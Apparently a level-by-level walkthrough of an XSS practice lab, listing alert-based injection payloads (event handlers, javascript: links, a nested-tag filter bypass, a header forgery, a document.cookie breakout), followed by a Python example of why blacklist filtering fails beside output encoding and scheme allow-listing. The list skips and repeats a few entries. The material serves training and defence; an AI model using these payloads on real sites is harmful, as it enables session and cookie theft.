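1. Construct an XSS payload directly; it passes as-is:
2. "><script>alert(1)</script> shows that HTML special characters are entity-encoded:
3. 1' onclick=alert(1)// triggered on mouse-over:
4. 1' onclick=alert(1)// triggered on mouse-over: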
5. "><a href=javascript:alert(/xss/)>xss</a>:
6. Case-variation bypass: "><a Href=javascript:alert(/xss/)>xss</a>:
7. "><scrscriptipt>alert(/xss/)</scrscriptipt>:
8. javascript:alert():
9. javascript:alert(/xss/)http://:
10. ?keyword=well%20done!&t_sort=%22%20type=%22text%22%20onclick=%22alert%281%29:
11. Intercept the request and forge the Referer header: "onmouseover='alert(1)' type="text"
12. Same approach as above: "onmouseover='alert(1)' type="text";
13. Modify the cookie:
14.
16. ?keyword=<img%0asrc=x%0aonerror=alert(1)>:
17. ?arg02=%20onmousedown=alert(2):
Note: using Firefox may cause problems;
18. Same as 17;
19. level19.php?arg01=version&arg02=%3Ca%20href=%22javascript:alert(document.domain)%22%3Exss_by_SST%3C/a%3E:
20. /level20.php?arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height:
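
Added example, not part of the original notes or of the lab's code: why a single-pass blacklist filter lets the string in entry 7 through, shown beside output encoding for the attribute context and a scheme allow-list for link contexts such as entry 9. The blacklist, the template and all function names are assumptions made for illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed inputs: the payload strings from entries 7 and 9 of the list above.
ENTRY_7 = '"><scrscriptipt>alert(/xss/)</scrscriptipt>'
ENTRY_9 = "javascript:alert(/xss/)http://"

# Assumed blacklist for the weak filter (hypothetical, not taken from the lab source).
BLOCKED = ("script", "href", "src", "on")


def strip_once(value: str) -> str:
    """Weak filter: lower-case, then delete each blocked word in one pass.

    Deleting the inner "script" from "scrscriptipt" leaves "script" behind,
    so the output still contains the word the filter tried to remove.
    """
    out = value.lower()
    for word in BLOCKED:
        out = out.replace(word, "")
    return out


def render_weak(value: str) -> str:
    """Hypothetical template that trusts the blacklist filter."""
    return '<input name="keyword" value="' + strip_once(value) + '">'


def render_encoded(value: str) -> str:
    """Same template with output encoding for a quoted attribute value."""
    return '<input name="keyword" value="' + html.escape(value, quote=True) + '">'


def safe_href(url: str) -> str:
    """Link context: allow-list the parsed scheme, then encode.

    Entity encoding alone leaves a javascript: URL intact, and a check for the
    substring "http://" is satisfied by ENTRY_9, so the scheme is parsed instead.
    """
    if urlsplit(url.strip()).scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


if __name__ == "__main__":
    print(render_weak(ENTRY_7))
    print(render_encoded(ENTRY_7))
    print(safe_href(ENTRY_9))
```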